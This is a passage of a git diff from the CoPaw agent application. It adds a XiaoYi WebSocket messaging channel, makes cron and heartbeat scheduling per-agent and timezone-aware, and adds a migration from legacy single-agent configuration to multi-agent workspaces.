"file_name", "file"), + "mimeType": "application/octet-stream", + "uri": file_url, + }, + } + + artifact_id = f"artifact_{uuid.uuid4().hex[:16]}" + + json_rpc_response = { + "jsonrpc": "2.0", + "id": str(uuid.uuid4()), + "result": { + "taskId": task_id, + "kind": "artifact-update", + "append": True, + "lastChunk": True, + "final": True, + "artifact": { + "artifactId": artifact_id, + "parts": [artifact_part], + }, + }, + } + + msg = { + "msgType": "agent_response", + "agentId": self.agent_id, + "sessionId": session_id, + "taskId": task_id, + "msgDetail": json.dumps(json_rpc_response), + } + + try: + await self._ws.send_json(msg) + except Exception as e: + logger.error(f"XiaoYi: Failed to send media: {e}") + + def _extract_xiaoyi_parts( + self, + message: Any, + ) -> List[Dict[str, Any]]: + # pylint: disable=too-many-branches,too-many-statements + # pylint: disable=too-many-nested-blocks + """Extract parts from message with proper XiaoYi kinds. + + XiaoYi supports: + - kind="reasoningText": For thinking/reasoning content + - kind="text": For regular text content + """ + from agentscope_runtime.engine.schemas.agent_schemas import ( + MessageType, + ) + + msg_type = getattr(message, "type", None) + content = getattr(message, "content", None) or [] + parts = [] + + # Check if this is a reasoning/thinking message type + if msg_type == MessageType.REASONING: + # Check if thinking is filtered + if self._render_style.filter_thinking: + return [] + for c in content: + text = getattr(c, "text", None) + if text: + # Add newline separator for each thinking content + parts.append( + { + "kind": "reasoningText", + "reasoningText": text + "\n", + }, + ) + return parts + + # Process each content item + for c in content: + ctype = getattr(c, "type", None) + + # Handle thinking blocks (inside DATA content as dict) + if ctype == ContentType.DATA: + data = getattr(c, "data", None) + if isinstance(data, dict): + # Check for thinking content in blocks + blocks = data.get("blocks", []) + 
if ( + isinstance(blocks, list) + and not self._render_style.filter_thinking + ): + for block in blocks: + if ( + isinstance(block, dict) + and block.get("type") == "thinking" + ): + thinking_text = block.get("thinking", "") + if thinking_text: + # Add newline separator + parts.append( + { + "kind": "reasoningText", + "reasoningText": thinking_text + + "\n", + }, + ) + + # Handle TEXT type (regular message content) + # Add leading newline to separate from previous content + if ctype == ContentType.TEXT and getattr(c, "text", None): + text = c.text + # Add leading newlines if not already present + if not text.startswith("\n"): + text = "\n\n" + text + parts.append({"kind": "text", "text": text}) + + # Handle REFUSAL type + elif ctype == ContentType.REFUSAL and getattr(c, "refusal", None): + parts.append({"kind": "text", "text": c.refusal}) + + # Handle tool call/output messages + # with complete, independent formatting + # Check if tool messages should be filtered + if self._render_style.filter_tool_messages: + if msg_type in ( + MessageType.FUNCTION_CALL, + MessageType.PLUGIN_CALL, + MessageType.MCP_TOOL_CALL, + MessageType.FUNCTION_CALL_OUTPUT, + MessageType.PLUGIN_CALL_OUTPUT, + MessageType.MCP_TOOL_CALL_OUTPUT, + ): + return [] + + if msg_type in ( + MessageType.FUNCTION_CALL, + MessageType.PLUGIN_CALL, + MessageType.MCP_TOOL_CALL, + ): + # Tool call: format as "🔧 **name**" + code block with args + for c in content: + if getattr(c, "type", None) != ContentType.DATA: + continue + data = getattr(c, "data", None) + if not isinstance(data, dict): + continue + name = data.get("name") or "tool" + args = data.get("arguments") or "{}" + # Complete, independent formatting for each tool call + formatted = f"\n\n🔧 **{name}**\n```\n{args}\n```\n" + parts.append({"kind": "text", "text": formatted}) + return parts + + if msg_type in ( + MessageType.FUNCTION_CALL_OUTPUT, + MessageType.PLUGIN_CALL_OUTPUT, + MessageType.MCP_TOOL_CALL_OUTPUT, + ): + # Tool output: format as "✅ 
**name**" + code block with result + for c in content: + if getattr(c, "type", None) != ContentType.DATA: + continue + data = getattr(c, "data", None) + if not isinstance(data, dict): + continue + name = data.get("name") or "tool" + output = data.get("output", "") + + # Parse output and format as JSON + try: + if isinstance(output, str): + parsed = json.loads(output) + else: + parsed = output + + # Handle list format like [{'type': 'text', 'text': '...'}] + if isinstance(parsed, list): + texts = [] + for item in parsed: + if ( + isinstance(item, dict) + and item.get("type") == "text" + ): + texts.append(item.get("text", "")) + output_str = "\n".join(texts) if texts else str(parsed) + elif isinstance(parsed, dict): + output_str = json.dumps( + parsed, + ensure_ascii=False, + indent=2, + ) + else: + output_str = str(parsed) + except (json.JSONDecodeError, TypeError): + output_str = str(output) if output else "" + + # Truncate if too long + if len(output_str) > 500: + output_str = output_str[:500] + "..." + + # Escape backticks in output + # to avoid breaking code blocks + output_str = output_str.replace("```", "\\`\\`\\`") + + # Complete, independent formatting + # for each tool output + # Ensure code block is properly closed + formatted = f"\n\n✅ **{name}**\n```\n{output_str}\n```\n" + parts.append({"kind": "text", "text": formatted}) + return parts + + # If no parts extracted, use renderer as fallback + if not parts: + rendered_parts = self._renderer.message_to_parts(message) + for rp in rendered_parts: + if getattr(rp, "type", None) == ContentType.TEXT: + text = getattr(rp, "text", "") + if text: + parts.append({"kind": "text", "text": text}) + + return parts + + async def send_xiaoyi_parts( + self, + to_handle: str, + parts: List[Dict[str, Any]], + meta: Optional[Dict[str, Any]] = None, + ) -> None: + # pylint: disable=too-many-branches,too-many-nested-blocks + """Send parts with XiaoYi-specific format. 
+
+        Each part is a dict with:
+        - kind: "text" or "reasoningText"
+        - text/reasoningText: the content string
+        """
+        if not self.enabled or not self._ws or not self._connected:
+            logger.warning("XiaoYi: Cannot send - not connected")
+            return
+
+        meta = meta or {}
+        session_id = meta.get("session_id") or to_handle
+        task_id = meta.get("task_id") or self._session_task_map.get(session_id)
+
+        if not task_id:
+            logger.warning(f"XiaoYi: No task_id for session {session_id}")
+            return
+
+        message_id = meta.get("message_id", str(uuid.uuid4()))
+
+        # Build artifact parts for XiaoYi
+        artifact_parts = []
+        for part in parts:
+            kind = part.get("kind", "text")
+            if kind == "reasoningText":
+                artifact_parts.append(
+                    {
+                        "kind": "reasoningText",
+                        "reasoningText": part.get("reasoningText", ""),
+                    },
+                )
+            elif kind == "text":
+                artifact_parts.append(
+                    {
+                        "kind": "text",
+                        "text": part.get("text", ""),
+                    },
+                )
+
+        if not artifact_parts:
+            return
+
+        # Check if any part exceeds chunk limit
+        max_part_len = max(
+            len(p.get("text", "") or p.get("reasoningText", ""))
+            for p in artifact_parts
+        )
+
+        if max_part_len > TEXT_CHUNK_LIMIT:
+            # Chunk each part separately, preserving kind
+            for part in artifact_parts:
+                kind = part.get("kind", "text")
+                content = part.get("text", "") or part.get("reasoningText", "")
+                if len(content) > TEXT_CHUNK_LIMIT:
+                    chunks = self._chunk_text(content)
+                    for chunk in chunks:
+                        if kind == "reasoningText":
+                            await self._send_reasoning_chunk(
+                                session_id,
+                                task_id,
+                                message_id,
+                                chunk,
+                            )
+                        else:
+                            await self._send_chunk(
+                                session_id,
+                                task_id,
+                                message_id,
+                                chunk,
+                            )
+                else:
+                    # Send small parts as-is
+                    if kind == "reasoningText":
+                        await self._send_reasoning_chunk(
+                            session_id,
+                            task_id,
+                            message_id,
+                            content,
+                        )
+                    else:
+                        await self._send_chunk(
+                            session_id,
+                            task_id,
+                            message_id,
+                            content,
+                        )
+            return
+
+        # Send as single message with proper parts
+        artifact_id = f"artifact_{uuid.uuid4().hex[:16]}"
+
+        json_rpc_response = {
+            "jsonrpc": "2.0",
+            "id": message_id,
+            "result": {
+                "taskId": task_id,
+                "kind": "artifact-update",
+                "append": True,
+                "lastChunk": False,
+                "final": False,
+                "artifact": {
+                    "artifactId": artifact_id,
+                    "parts": artifact_parts,
+                },
+            },
+        }
+
+        msg = {
+            "msgType": "agent_response",
+            "agentId": self.agent_id,
+            "sessionId": session_id,
+            "taskId": task_id,
+            "msgDetail": json.dumps(json_rpc_response),
+        }
+
+        try:
+            await self._ws.send_json(msg)
+        except Exception as e:
+            logger.error(f"XiaoYi: Failed to send parts: {e}")
+
+    async def on_event_message_completed(
+        self,
+        request: "AgentRequest",
+        to_handle: str,
+        event: Any,
+        send_meta: Dict[str, Any],
+    ) -> None:
+        """Override to handle XiaoYi-specific message formatting.
+
+        Separates thinking/reasoning content from regular text.
+        """
+        # Extract parts with proper kinds
+        parts = self._extract_xiaoyi_parts(event)
+
+        if not parts:
+            logger.debug("XiaoYi: No parts to send for message")
+            return
+
+        # Send with XiaoYi format
+        await self.send_xiaoyi_parts(to_handle, parts, send_meta)
+
+    def resolve_session_id(
+        self,
+        sender_id: str,
+        channel_meta: Optional[Dict[str, Any]] = None,
+    ) -> str:
+        """Resolve session ID from sender and meta."""
+        if channel_meta and channel_meta.get("session_id"):
+            return f"xiaoyi:{channel_meta['session_id']}"
+        return f"xiaoyi:{sender_id}"
+
+    def get_to_handle_from_request(self, request: "AgentRequest") -> str:
+        """Get send target from request."""
+        meta = getattr(request, "channel_meta", None) or {}
+        if meta.get("session_id"):
+            return meta["session_id"]
+        return getattr(request, "user_id", "") or ""
+
+    def build_agent_request_from_native(
+        self,
+        native_payload: Any,
+    ) -> "AgentRequest":
+        """Build AgentRequest from native payload."""
+        payload = native_payload if isinstance(native_payload, dict) else {}
+
+        channel_id = payload.get("channel_id") or self.channel
+        sender_id = payload.get("sender_id") or ""
+        content_parts = payload.get("content_parts") or []
+        meta = payload.get("meta") or {}
+
+        session_id = self.resolve_session_id(sender_id, meta)
+
+        request = self.build_agent_request_from_user_content(
+            channel_id=channel_id,
+            sender_id=sender_id,
+            session_id=session_id,
+            content_parts=content_parts,
+            channel_meta=meta,
+        )
+        request.user_id = sender_id
+        request.channel_meta = meta
+        return request
+
+    def to_handle_from_target(self, *, user_id: str, session_id: str) -> str:
+        """Map dispatch target to channel-specific to_handle."""
+        if session_id.startswith("xiaoyi:"):
+            return session_id.split(":", 1)[-1]
+        return user_id
+
+    async def _run_process_loop(
+        self,
+        request: "AgentRequest",
+        to_handle: str,
+        send_meta: Dict[str, Any],
+    ) -> None:
+        """Run process and send events. Override to send final message."""
+        from agentscope_runtime.engine.schemas.agent_schemas import RunStatus
+
+        last_response = None
+        session_id = send_meta.get("session_id") or to_handle
+
+        try:
+            async for event in self._process(request):
+                obj = getattr(event, "object", None)
+                status = getattr(event, "status", None)
+                if obj == "message" and status == RunStatus.Completed:
+                    await self.on_event_message_completed(
+                        request,
+                        to_handle,
+                        event,
+                        send_meta,
+                    )
+                elif obj == "response":
+                    last_response = event
+                    await self.on_event_response(request, event)
+
+            # Send final message to end the stream
+            task_id = send_meta.get("task_id") or self._session_task_map.get(
+                session_id,
+            )
+            message_id = str(uuid.uuid4())
+
+            if task_id and session_id:
+                await self.send_final_message(session_id, task_id, message_id)
+
+            err_msg = self._get_response_error_message(last_response)
+            if err_msg:
+                await self._on_consume_error(
+                    request,
+                    to_handle,
+                    f"Error: {err_msg}",
+                )
+            if self._on_reply_sent:
+                args = self.get_on_reply_sent_args(request, to_handle)
+                self._on_reply_sent(self.channel, *args)
+        except Exception:
+            logger.exception("XiaoYi channel consume_one failed")
+            await self._on_consume_error(
+                request,
+                to_handle,
+                "An error occurred while processing your request.",
+            )
diff --git a/src/copaw/app/channels/xiaoyi/constants.py b/src/copaw/app/channels/xiaoyi/constants.py
new file mode 100644
index 000000000..3f6649a8d
--- /dev/null
+++ b/src/copaw/app/channels/xiaoyi/constants.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+"""XiaoYi channel constants."""
+
+# Default WebSocket URL
+DEFAULT_WS_URL = "wss://hag.cloud.huawei.com/openclaw/v1/ws/link"
+
+# Heartbeat interval (seconds)
+HEARTBEAT_INTERVAL = 30
+
+# Reconnect delays (seconds)
+RECONNECT_DELAYS = [1, 2, 5, 10, 30, 60]
+MAX_RECONNECT_ATTEMPTS = 50
+
+# Connection timeout (seconds)
+CONNECTION_TIMEOUT = 30
+
+# Task timeout (milliseconds)
+DEFAULT_TASK_TIMEOUT_MS = 3600000  # 1 hour
+
+# Maximum text chunk size (characters)
+# Larger messages will be split to avoid WebSocket disconnection
+TEXT_CHUNK_LIMIT = 4000
diff --git a/src/copaw/app/crons/api.py b/src/copaw/app/crons/api.py
index a52b44399..21ca65138 100644
--- a/src/copaw/app/crons/api.py
+++ b/src/copaw/app/crons/api.py
@@ -10,14 +10,19 @@
 router = APIRouter(prefix="/cron", tags=["cron"])
 
 
-def get_cron_manager(request: Request) -> CronManager:
-    mgr = getattr(request.app.state, "cron_manager", None)
-    if mgr is None:
+async def get_cron_manager(
+    request: Request,
+) -> CronManager:
+    """Get cron manager for the active agent."""
+    from ..agent_context import get_agent_for_request
+
+    workspace = await get_agent_for_request(request)
+    if workspace.cron_manager is None:
         raise HTTPException(
-            status_code=503,
-            detail="cron manager not initialized",
+            status_code=500,
+            detail="CronManager not initialized",
         )
-    return mgr
+    return workspace.cron_manager
 
 
 @router.get("/jobs", response_model=list[CronJobSpec])
diff --git a/src/copaw/app/crons/heartbeat.py b/src/copaw/app/crons/heartbeat.py
index 7b165db37..c6c284614 100644
--- a/src/copaw/app/crons/heartbeat.py
+++ b/src/copaw/app/crons/heartbeat.py
@@ -9,15 +9,17 @@
 import asyncio
 import logging
 import re
-from datetime import datetime, time
-from typing import Any, Dict
+from datetime import datetime, time, timezone
+from pathlib import Path
+from zoneinfo import ZoneInfo, ZoneInfoNotFoundError
+from typing import Any, Dict, Optional
 
 from ...config import (
     get_heartbeat_config,
     get_heartbeat_query_path,
     load_config,
 )
-from ...constant import HEARTBEAT_TARGET_LAST
+from ...constant import HEARTBEAT_FILE, HEARTBEAT_TARGET_LAST
 
 logger = logging.getLogger(__name__)
 
@@ -26,8 +28,6 @@
     r"^(?:(?P<h>\d+)h)?(?:(?P<m>\d+)m)?(?:(?P<s>\d+)s)?$",
     re.IGNORECASE,
 )
-
-
 def parse_heartbeat_every(every: str) -> int:
     """Parse interval string (e.g. '30m', '1h') to total seconds."""
     every = (every or "").strip()
@@ -47,7 +47,9 @@ def parse_heartbeat_every(every: str) -> int:
 
 def _in_active_hours(active_hours: Any) -> bool:
-    """Return True if current local time is within [start, end]."""
+    """Return True if the current time in user timezone is within
+    [start, end].
+    """
     if (
         not active_hours
         or not hasattr(active_hours, "start")
@@ -67,7 +69,16 @@
         )
     except (ValueError, IndexError, AttributeError):
         return True
-    now = datetime.now().time()
+    user_tz = load_config().user_timezone or "UTC"
+    try:
+        now = datetime.now(ZoneInfo(user_tz)).time()
+    except (ZoneInfoNotFoundError, KeyError):
+        logger.warning(
+            "Invalid timezone %r in config, falling back to UTC"
+            " for heartbeat active hours check.",
+            user_tz,
+        )
+        now = datetime.now(timezone.utc).time()
     if start_t <= end_t:
         return start_t <= now <= end_t
     return now >= start_t or now <= end_t
@@ -77,18 +88,32 @@
 async def run_heartbeat_once(
     *,
     runner: Any,
     channel_manager: Any,
+    agent_id: Optional[str] = None,
+    workspace_dir: Optional[Path] = None,
 ) -> None:
     """
-    Run one heartbeat: read HEARTBEAT.md via config path, run agent,
+    Run one heartbeat: read HEARTBEAT.md from workspace, run agent,
     optionally dispatch to last channel (target=last).
+
+    Args:
+        runner: Agent runner instance
+        channel_manager: Channel manager instance
+        agent_id: Agent ID for loading config
+        workspace_dir: Workspace directory for reading HEARTBEAT.md
     """
-    config = load_config()
-    hb = get_heartbeat_config()
+    from ...config.config import load_agent_config
+
+    hb = get_heartbeat_config(agent_id)
     if not _in_active_hours(hb.active_hours):
         logger.debug("heartbeat skipped: outside active hours")
         return
-    path = get_heartbeat_query_path()
+    # Use workspace_dir if provided, otherwise fall back to global path
+    if workspace_dir:
+        path = Path(workspace_dir) / HEARTBEAT_FILE
+    else:
+        path = get_heartbeat_query_path()
+
     if not path.is_file():
         logger.debug("heartbeat skipped: no file at %s", path)
         return
@@ -110,7 +135,21 @@
         "user_id": "main",
     }
 
+    # Get last_dispatch from agent config if agent_id provided
+    last_dispatch = None
+    if agent_id:
+        try:
+            agent_config = load_agent_config(agent_id)
+            last_dispatch = agent_config.last_dispatch
+        except Exception:
+            pass
+    else:
+        # Legacy: try root config
+        config = load_config()
+        last_dispatch = config.last_dispatch
+
     target = (hb.target or "").strip().lower()
+    heartbeat_ran = False
-    if target == HEARTBEAT_TARGET_LAST and config.last_dispatch:
-        ld = config.last_dispatch
+    if target == HEARTBEAT_TARGET_LAST and last_dispatch:
+        ld = last_dispatch
         if ld.channel and (ld.user_id or ld.session_id):
@@ -127,16 +166,18 @@ async def _run_and_dispatch() -> None:
             try:
                 await asyncio.wait_for(_run_and_dispatch(), timeout=120)
+                heartbeat_ran = True
             except asyncio.TimeoutError:
                 logger.warning("heartbeat run timed out")
-            return
+                heartbeat_ran = True
 
     # target main or no last_dispatch: run agent only, no dispatch
-    async def _run_only() -> None:
-        async for _ in runner.stream_query(req):
-            pass
-
-    try:
-        await asyncio.wait_for(_run_only(), timeout=120)
-    except asyncio.TimeoutError:
-        logger.warning("heartbeat run timed out")
+    if not heartbeat_ran:
+        async def _run_only() -> None:
+            async for _ in runner.stream_query(req):
+                pass
+
+        try:
+            await asyncio.wait_for(_run_only(), timeout=120)
+        except asyncio.TimeoutError:
+            logger.warning("heartbeat run timed out")
diff --git a/src/copaw/app/crons/manager.py b/src/copaw/app/crons/manager.py
index 5be0930fe..93b80a0f7 100644
--- a/src/copaw/app/crons/manager.py
+++ b/src/copaw/app/crons/manager.py
@@ -4,7 +4,7 @@
 import asyncio
 import logging
 from dataclasses import dataclass
-from datetime import datetime
+from datetime import datetime, timezone
 from typing import Any, Dict, Optional
 
 from apscheduler.schedulers.asyncio import AsyncIOScheduler
@@ -36,11 +36,13 @@ def __init__(
         repo: BaseJobRepository,
         runner: Any,
         channel_manager: Any,
-        timezone: str = "UTC",
+        timezone: str = "UTC",  # pylint: disable=redefined-outer-name
+        agent_id: Optional[str] = None,
     ):
         self._repo = repo
         self._runner = runner
         self._channel_manager = channel_manager
+        self._agent_id = agent_id
         self._scheduler = AsyncIOScheduler(timezone=timezone)
         self._executor = CronExecutor(
             runner=runner,
@@ -60,11 +62,23 @@ async def start(self) -> None:
         self._scheduler.start()
 
         for job in jobs_file.jobs:
-            await self._register_or_update(job)
+            try:
+                await self._register_or_update(job)
+            except Exception as exc:  # pylint: disable=broad-except
+                logger.exception(
+                    "cron startup skipped invalid job: id=%s name=%s cron=%s",
+                    job.id,
+                    job.name,
+                    job.schedule.cron,
+                )
+                self._states[job.id] = CronJobState(
+                    last_status="error",
+                    last_error=str(exc),
+                )
 
         # Heartbeat: one interval job when enabled in config
-        hb = get_heartbeat_config()
-        if getattr(hb, "enabled", True):
+        hb = get_heartbeat_config(self._agent_id)
+        if getattr(hb, "enabled", False):
             interval_seconds = parse_heartbeat_every(hb.every)
             self._scheduler.add_job(
                 self._heartbeat_callback,
@@ -72,6 +86,10 @@
                 id=HEARTBEAT_JOB_ID,
                 replace_existing=True,
             )
+            logger.info(
+                f"Heartbeat job scheduled for agent {self._agent_id}: "
+                f"every={hb.every} (interval={interval_seconds}s)",
+            )
 
         self._started = True
@@ -118,14 +136,27 @@ async def resume_job(self, job_id: str) -> None:
             self._scheduler.resume_job(job_id)
 
     async def reschedule_heartbeat(self) -> None:
-        """Reload heartbeat config and update or remove the heartbeat job."""
+        """Reload heartbeat config and update or remove the heartbeat job.
+
+        Note: CronManager should always be started during workspace
+        initialization, so this method assumes self._started is True.
+        """
         async with self._lock:
             if not self._started:
+                logger.warning(
+                    f"CronManager not started for agent {self._agent_id}, "
+                    f"cannot reschedule heartbeat. This should not happen.",
+                )
                 return
-            hb = get_heartbeat_config()
+
+            hb = get_heartbeat_config(self._agent_id)
+
+            # Remove existing heartbeat job if present
             if self._scheduler.get_job(HEARTBEAT_JOB_ID):
                 self._scheduler.remove_job(HEARTBEAT_JOB_ID)
-            if getattr(hb, "enabled", True):
+
+            # Add heartbeat job if enabled
+            if getattr(hb, "enabled", False):
                 interval_seconds = parse_heartbeat_every(hb.every)
                 self._scheduler.add_job(
                     self._heartbeat_callback,
@@ -258,9 +289,16 @@ async def _scheduled_callback(self, job_id: str) -> None:
 
     async def _heartbeat_callback(self) -> None:
         """Run one heartbeat (HEARTBEAT.md as query, optional dispatch)."""
         try:
+            # Get workspace_dir from runner if available
+            workspace_dir = None
+            if hasattr(self._runner, "workspace_dir"):
+                workspace_dir = self._runner.workspace_dir
+
             await run_heartbeat_once(
                 runner=self._runner,
                 channel_manager=self._channel_manager,
+                agent_id=self._agent_id,
+                workspace_dir=workspace_dir,
             )
         except Exception:  # pylint: disable=broad-except
             logger.exception("heartbeat run failed")
@@ -294,5 +332,5 @@ async def _execute_once(self, job: CronJobSpec) -> None:
             )
             raise
         finally:
-            st.last_run_at = datetime.utcnow()
+            st.last_run_at = datetime.now(timezone.utc)
             self._states[job.id] = st
diff --git a/src/copaw/app/crons/models.py b/src/copaw/app/crons/models.py
index f207e18dd..bf0169b11 100644
--- a/src/copaw/app/crons/models.py
+++ b/src/copaw/app/crons/models.py
@@ -44,6 +44,9 @@ def _crontab_dow_to_name(field: str) -> str:
         return field
 
     def _convert_token(tok: str) -> str:
+        if "/" in tok:
+            base, step = tok.rsplit("/", 1)
+            return f"{_convert_token(base)}/{step}"
         if "-" in tok:
             parts = tok.split("-", 1)
             return "-".join(_CRONTAB_NUM_TO_NAME.get(p, p) for p in parts)
diff --git a/src/copaw/app/crons/repo/json_repo.py b/src/copaw/app/crons/repo/json_repo.py
index fc1c47025..ecc40de11 100644
--- a/src/copaw/app/crons/repo/json_repo.py
+++ b/src/copaw/app/crons/repo/json_repo.py
@@ -17,7 +17,9 @@ class JsonJobRepository(BaseJobRepository):
     - Atomic write: write tmp then replace.
     """
 
-    def __init__(self, path: Path):
+    def __init__(self, path: Path | str):
+        if isinstance(path, str):
+            path = Path(path)
         self._path = path.expanduser()
 
     @property
diff --git a/src/copaw/app/migration.py b/src/copaw/app/migration.py
new file mode 100644
index 000000000..b852c371d
--- /dev/null
+++ b/src/copaw/app/migration.py
@@ -0,0 +1,333 @@
+# -*- coding: utf-8 -*-
+"""Configuration migration utilities for multi-agent support.
+
+Handles migration from legacy single-agent config to new multi-agent structure.
+"""
+import json
+import logging
+import shutil
+from pathlib import Path
+
+from ..config.config import (
+    AgentProfileConfig,
+    AgentProfileRef,
+    AgentsConfig,
+    AgentsRunningConfig,
+    AgentsLLMRoutingConfig,
+)
+from ..constant import WORKING_DIR
+from ..config.utils import load_config, save_config
+
+logger = logging.getLogger(__name__)
+
+_LEGACY_DEFAULT_WORKING_DIR = Path("~/.copaw").expanduser().resolve()
+
+
+def migrate_legacy_workspace_to_default_agent() -> bool:
+    """Migrate legacy single-agent workspace to default agent workspace.
+
+    This function:
+    1. Checks if migration is needed
+    2. Creates default agent workspace
+    3. Migrates sessions, memory, and markdown files
+    4. Creates agent.json with legacy configuration
+    5. Updates root config.json to new structure
+
+    Returns:
+        bool: True if migration was performed, False if already migrated
+    """
+    try:
+        config = load_config()
+    except Exception as e:
+        logger.error(f"Failed to load config: {e}")
+        return False
+
+    # Check if already migrated
+    # Skip if:
+    # 1. Multiple agents already exist (multi-agent config), OR
+    # 2. Default agent has agent.json (already migrated)
+    if len(config.agents.profiles) > 1:
+        logger.debug(
+            f"Multi-agent config already exists "
+            f"({len(config.agents.profiles)} agents), skipping migration",
+        )
+        return False
+
+    if "default" in config.agents.profiles:
+        agent_ref = config.agents.profiles["default"]
+        if isinstance(agent_ref, AgentProfileRef):
+            workspace_dir = Path(agent_ref.workspace_dir).expanduser()
+            agent_config_path = workspace_dir / "agent.json"
+            if agent_config_path.exists():
+                logger.debug(
+                    "Default agent already migrated, skipping migration",
+                )
+                return False
+
+    logger.info("=" * 60)
+    logger.info("Migrating legacy config to multi-agent structure...")
+    logger.info("=" * 60)
+
+    # Extract legacy agent configuration
+    legacy_agents = config.agents
+
+    # Create default agent workspace
+    default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser()
+    default_workspace.mkdir(parents=True, exist_ok=True)
+    logger.info(f"Created default agent workspace: {default_workspace}")
+
+    # Build default agent configuration from legacy settings
+    default_agent_config = AgentProfileConfig(
+        id="default",
+        name="Default Agent",
+        description="Default CoPaw agent (migrated from legacy config)",
+        workspace_dir=str(default_workspace),
+        channels=config.channels if hasattr(config, "channels") else None,
+        mcp=config.mcp if hasattr(config, "mcp") else None,
+        heartbeat=(
+            legacy_agents.defaults.heartbeat
+            if hasattr(legacy_agents, "defaults") and legacy_agents.defaults
+            else None
+        ),
+        running=(
+            legacy_agents.running
+            if hasattr(legacy_agents, "running") and legacy_agents.running
+            else AgentsRunningConfig()
+        ),
+        llm_routing=(
+            legacy_agents.llm_routing
+            if hasattr(legacy_agents, "llm_routing")
+            and legacy_agents.llm_routing
+            else AgentsLLMRoutingConfig()
+        ),
+        system_prompt_files=(
+            legacy_agents.system_prompt_files
+            if hasattr(legacy_agents, "system_prompt_files")
+            and legacy_agents.system_prompt_files
+            else ["AGENTS.md", "SOUL.md", "PROFILE.md"]
+        ),
+        tools=config.tools if hasattr(config, "tools") else None,
+        security=config.security if hasattr(config, "security") else None,
+    )
+
+    # Save default agent configuration to workspace/agent.json
+    agent_config_path = default_workspace / "agent.json"
+    with open(agent_config_path, "w", encoding="utf-8") as f:
+        json.dump(
+            default_agent_config.model_dump(exclude_none=True),
+            f,
+            ensure_ascii=False,
+            indent=2,
+        )
+    logger.info(f"Created agent config: {agent_config_path}")
+
+    # Migrate existing workspace files from legacy default working dir.
+    # When COPAW_WORKING_DIR is customized, historical data may still exist
+    # under "~/.copaw".
+    old_workspace = _LEGACY_DEFAULT_WORKING_DIR
+
+    migrated_items = []
+
+    # Migrate sessions directory
+    _migrate_workspace_item(
+        old_workspace / "sessions",
+        default_workspace / "sessions",
+        "sessions",
+        migrated_items,
+    )
+
+    # Migrate memory directory
+    _migrate_workspace_item(
+        old_workspace / "memory",
+        default_workspace / "memory",
+        "memory",
+        migrated_items,
+    )
+
+    # Migrate chats.json
+    _migrate_workspace_item(
+        old_workspace / "chats.json",
+        default_workspace / "chats.json",
+        "chats.json",
+        migrated_items,
+    )
+
+    # Migrate jobs.json
+    _migrate_workspace_item(
+        old_workspace / "jobs.json",
+        default_workspace / "jobs.json",
+        "jobs.json",
+        migrated_items,
+    )
+
+    # Migrate markdown files
+    for md_file in [
+        "AGENTS.md",
+        "SOUL.md",
+        "PROFILE.md",
+        "HEARTBEAT.md",
+        "MEMORY.md",
+        "BOOTSTRAP.md",
+    ]:
+        _migrate_workspace_item(
+            old_workspace / md_file,
+            default_workspace / md_file,
+            md_file,
+            migrated_items,
+        )
+
+    # Migrate channel-specific configuration files
+    _migrate_workspace_item(
+        old_workspace / "feishu_receive_ids.json",
+        default_workspace / "feishu_receive_ids.json",
+        "feishu_receive_ids.json",
+        migrated_items,
+    )
+
+    _migrate_workspace_item(
+        old_workspace / "dingtalk_session_webhooks.json",
+        default_workspace / "dingtalk_session_webhooks.json",
+        "dingtalk_session_webhooks.json",
+        migrated_items,
+    )
+
+    if migrated_items:
+        logger.info(f"Migrated workspace items: {', '.join(migrated_items)}")
+
+    # Update root config.json to new structure
+    # CRITICAL: Preserve legacy agent fields in root config for downgrade
+    # compatibility. Old versions expect these fields to have valid values.
+    config.agents = AgentsConfig(
+        active_agent="default",
+        profiles={
+            "default": AgentProfileRef(
+                id="default",
+                workspace_dir=str(default_workspace),
+            ),
+        },
+        # Preserve legacy fields with values from migrated agent config
+        running=default_agent_config.running,
+        llm_routing=default_agent_config.llm_routing,
+        language=default_agent_config.language,
+        system_prompt_files=default_agent_config.system_prompt_files,
+    )
+
+    # IMPORTANT: Keep original config fields in root config.json for
+    # backward compatibility. If user downgrades, old version can still
+    # use these fields. New version will prioritize agent.json.
+    # DO NOT clear: channels, mcp, tools, security fields
+
+    save_config(config)
+    logger.info(
+        "Updated root config.json to multi-agent structure "
+        "(kept original fields for backward compatibility)",
+    )
+
+    logger.info("=" * 60)
+    logger.info("Migration completed successfully!")
+    logger.info(f"  Default agent workspace: {default_workspace}")
+    logger.info(f"  Default agent config: {agent_config_path}")
+    logger.info("=" * 60)
+
+    return True
+
+
+def _migrate_workspace_item(
+    old_path: Path,
+    new_path: Path,
+    item_name: str,
+    migrated_items: list,
+) -> None:
+    """Migrate a single workspace item (file or directory).
+
+    Args:
+        old_path: Source path
+        new_path: Destination path
+        item_name: Name for logging
+        migrated_items: List to append migrated item names
+    """
+    if not old_path.exists():
+        return
+
+    if new_path.exists():
+        logger.debug(f"Skipping {item_name} (already exists in new location)")
+        return
+
+    try:
+        if old_path.is_dir():
+            shutil.copytree(old_path, new_path)
+        else:
+            new_path.parent.mkdir(parents=True, exist_ok=True)
+            shutil.copy2(old_path, new_path)
+
+        migrated_items.append(item_name)
+        logger.debug(f"Migrated {item_name}")
+    except Exception as e:
+        logger.warning(f"Failed to migrate {item_name}: {e}")
+
+
+def ensure_default_agent_exists() -> None:
+    """Ensure that the default agent exists in config.
+
+    This function is called on startup to verify the default agent
+    is properly configured. If not, it will be created.
+    Also ensures necessary workspace files exist (chats.json, jobs.json).
+    """
+    config = load_config()
+
+    # Get or determine default workspace path
+    if "default" in config.agents.profiles:
+        agent_ref = config.agents.profiles["default"]
+        default_workspace = Path(agent_ref.workspace_dir).expanduser()
+        agent_existed = True
+    else:
+        default_workspace = Path(
+            f"{WORKING_DIR}/workspaces/default",
+        ).expanduser()
+        agent_existed = False
+
+    # Ensure workspace directory exists
+    default_workspace.mkdir(parents=True, exist_ok=True)
+
+    # Always ensure chats.json exists (even if agent already registered)
+    chats_file = default_workspace / "chats.json"
+    if not chats_file.exists():
+        with open(chats_file, "w", encoding="utf-8") as f:
+            json.dump(
+                {"version": 1, "chats": []},
+                f,
+                ensure_ascii=False,
+                indent=2,
+            )
+        logger.debug("Created chats.json for default agent")
+
+    # Always ensure jobs.json exists (even if agent already registered)
+    jobs_file = default_workspace / "jobs.json"
+    if not jobs_file.exists():
+        with open(jobs_file, "w", encoding="utf-8") as f:
+            json.dump(
+                {"version": 1, "jobs": []},
+                f,
+                ensure_ascii=False,
+                indent=2,
+            )
